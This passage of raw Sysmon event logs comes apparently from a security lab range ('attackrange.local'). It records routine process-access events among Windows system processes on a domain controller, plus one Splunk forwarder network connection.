10341000x80000000000000001055542Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055541Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055540Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055539Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055538Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055537Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000980874Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:41.819{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59515-false10.0.1.12-8000- 10341000x80000000000000001055536Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055535Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055534Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1700-00000000FD01}1396C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055533Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBD-6151-0A00-00000000FD01}624684C:\Windows\system32\services.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055532Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055531Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.342{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055530Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.342{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+58a7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055529Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.342{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055528Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.342{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055527Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.342{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055526Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.327{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055525Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.327{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+58a7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055524Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.327{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055523Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.327{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055522Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.327{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2600-00000000FD01}2944C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055521Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.327{5EBD8912-8CD0-6151-2600-00000000FD01}29443028C:\Windows\System32\spoolsv.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\spoolsv.exe+1b7a3|C:\Windows\System32\spoolsv.exe+1b609|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a27b|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055520Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.311{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055519Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.311{5EBD8912-8CBF-6151-0C00-00000000FD01}84496C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8800-00000000FD01}812C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055518Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.311{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055517Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 